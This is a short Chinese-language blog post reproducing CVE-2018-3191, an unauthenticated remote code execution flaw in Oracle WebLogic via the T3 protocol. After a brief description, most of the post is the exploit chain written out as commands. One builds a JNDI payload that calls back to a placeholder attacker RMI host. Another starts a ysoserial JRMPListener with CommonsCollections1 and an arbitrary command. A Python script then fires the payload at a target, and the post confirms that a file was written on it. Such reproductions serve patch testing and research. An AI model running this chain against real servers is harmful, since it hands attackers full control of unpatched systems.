CVE-2018-3191遠端程式碼命令執行漏洞
阿新 • • 發佈:2018-11-25
0x00 weblogic漏洞簡介
北京時間10月17日,Oracle官方釋出的10月關鍵補丁更新CPU(Critical Patch Update)中修復了一個高危的WebLogic遠端程式碼執行漏洞(CVE-2018-3191)。該漏洞允許未經身份驗證的攻擊者通過T3協議網路訪問並破壞易受攻擊的WebLogic Server,成功的漏洞利用可導致WebLogic Server被攻擊者接管,從而造成遠端程式碼執行。這個漏洞由Matthias Kaiser,loopx9,Li Zhengdong申報。
0x01復現準備
首先準備payload
java -jar weblogic-spring-jndi.jar rmi://攻擊端ip:埠/Exp > payload.txt
然後搭建rmi伺服器端
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 埠 CommonsCollections1 "要執行的指令"
0x02 復現
Python weblogic.py target_ip target_port payload.txt
此時rmi伺服器那邊能看到有連線
0x03 驗證結果
此時可以看到1.txt寫入了